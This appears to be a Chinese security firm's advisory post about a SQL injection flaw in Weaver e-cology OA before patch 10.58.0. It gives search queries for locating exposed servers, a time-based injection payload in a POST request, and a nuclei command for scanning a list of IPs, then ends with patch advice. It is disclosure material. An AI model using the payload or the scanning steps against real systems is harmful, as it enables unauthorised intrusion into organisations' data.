点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
添加星标不迷路
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦
前言
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。
一、漏洞影响范围
Ecology 9.x 补丁版本 < 10.58.0
Ecology 8.x 补丁版本 < 10.58.0
二、搜索语法
app.name="泛微 e-cology 9.0 OA"
app.name="泛微 e-cology OA"
三、poc特征
POST //weaver/weaver.file.FileDownloadForOutDoc
fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
目前漏扫工具 nuclei 也公布了POC:
https://github.com/UltimateSec/ultimaste-nuclei-templates/tree/main/ecology-oa
四、漏洞复现
使用 nuclei 扫描:
nuclei -t .pocsecology-oa-filedownloadforoutdoc-sqli.yaml -l .ip.txt -o vulns.txt
五、修复方式
目前官方已发布安全补丁,建议受影响用户尽快升级至10.58及以上版本。
https://link.zhihu.com/?target=https%3A//www.weaver.com.cn/cs/securityDownload.asp%23
#
企业简介
赛克艾威 - 专注政企安全服务
北京赛克艾威科技有限公司(简称:赛克艾威),成立于2016年9月,具有中国网络安全审查技术与认证中心安全风险评估服务三级资质CCRC,信息安全保障人员资质CISAW(安全评估专家级)。
安全评估|渗透测试|漏洞扫描|安全巡检
代码审计|钓鱼演练|应急响应|安全运维
重大时刻安保|企业安全培训
联系方式
电话|010-86460828
官网|https://sechub.com.cn
关注我们
公众号:SecHub网络安全社区
哔哩号:SecHub官方账号
原文始发于微信公众号(SecHub网络安全社区):含复现 | 泛微E-Cology SQL注入漏洞预警
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论